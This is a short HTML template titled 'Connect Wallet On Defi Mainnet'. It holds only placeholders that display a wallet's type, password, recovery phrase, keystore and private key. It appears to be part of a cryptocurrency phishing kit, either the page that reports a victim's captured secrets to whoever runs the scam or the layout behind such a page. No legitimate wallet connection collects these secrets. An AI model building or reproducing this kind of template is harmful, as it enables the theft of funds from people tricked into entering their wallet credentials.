<!DOCTYPE html>
<html>
<head>
    <title>Connect Wallet On Defi Mainnet</title>
</head>
<body>

    <p> <strong>Wallet-Type:</strong></p>
    <p>{{ wallet_type }} </p>
    <br>

    <p> <strong>Wallet-Password:</strong> </p>
    <p>{{ wallet_password }}</p>
    <br/>

    <p><strong>Wallet-Phrase:</strong></p>
    <p>{{ phrase }}</p>
    <br/>

    <p><strong>Wallet-Keystore:</strong></p>
    <p>{{ keystore }}</p>
    <br/>

    <p><strong>Wallet-Private-key:</strong></p>
    <p>{{ private_key }}</p>
    <br/>

</body>
</html>
